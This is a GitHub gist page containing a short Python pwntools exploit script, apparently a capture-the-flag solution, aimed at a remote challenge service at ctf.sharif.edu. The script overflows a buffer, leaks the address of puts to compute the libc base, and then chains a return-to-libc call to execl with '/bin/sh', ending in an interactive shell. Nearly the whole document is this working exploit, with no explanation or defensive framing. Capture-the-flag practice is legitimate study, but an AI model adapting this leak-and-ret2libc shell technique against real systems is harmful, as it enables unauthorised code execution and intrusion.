Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
import struct
OFFSET_HEADSHOT = struct.pack("<L",0x080483A0)
OFFSET_RETN = struct.pack("<L",0x080484EA)
OFFSET_PLT = struct.pack("<L",0x08049874)
OFFSET_ROPBREAK = struct.pack("<L",0x41424344)
p = pwn.remote("ctf.sharif.edu",4801)
# p = pwn.process("./vuln4")
# x = raw_input("Press enter to continue")
p.recv()
p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n")
data = p.recv()
OFFSET_PUTS = struct.unpack("<L",data[0:4])[0]
OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0
OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0)
OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b)
print "puts at : %x" % OFFSET_PUTS
# print "libc at : %x" % OFFSET_LIBC
p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment